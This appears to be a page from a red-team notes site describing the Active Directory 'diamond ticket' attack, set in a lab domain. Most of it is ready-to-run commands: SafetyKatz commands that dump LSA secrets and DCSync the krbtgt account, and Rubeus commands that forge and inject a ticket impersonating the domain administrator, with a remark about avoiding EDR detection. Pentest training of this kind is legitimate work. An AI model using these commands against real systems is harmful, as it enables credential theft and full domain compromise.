diamond-ticket

Methodology

Retrieve the AES-256 key or RC4 hash of the service account.
Modify and inject the ticket.
Impersonate any user

Binaries

[!INFO] Remember to follow the Binaries methodology

SafetyKatz

Retrieve the AES-256 key of the service account:

SafetyKatz.exe '"lsadump::lsa /patch"'
SafetyKatz.exe '"lsadump::dcsync /user:contoso\krbtgt"'

Rubeus

Create a diamond ticket:

With an NTLM hash (Usually flagged by EDRs)

Rubeus.exe diamond /krbkey:32ED87BDB5FDC5E9CBA88547376818D4 /user:studentuserx /password:studentuserxpassword /enctype:rc4 /ticketuser:administrator /domain:us.contoso.local /dc:US-DC.us.contoso.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

With an AES-256 key (Admin cmd required)

Rubeus.exe diamond /krbkey:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5 /user:studentuserx /password:studentuserxpassword /enctype:aes /ticketuser:administrator /domain:us.contoso.local /dc:US-DC.us.contoso.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

With access to a domain account

Rubeus.exe diamond /krbkey:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:us.contoso.local /dc:US-DC.us.contoso.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Previouscustom-ssp Nextdpapi

Last updated 3 months ago

hashtagMethodology

hashtagBinaries

hashtagSafetyKatz

hashtagRubeus

Methodology

Binaries

SafetyKatz

Rubeus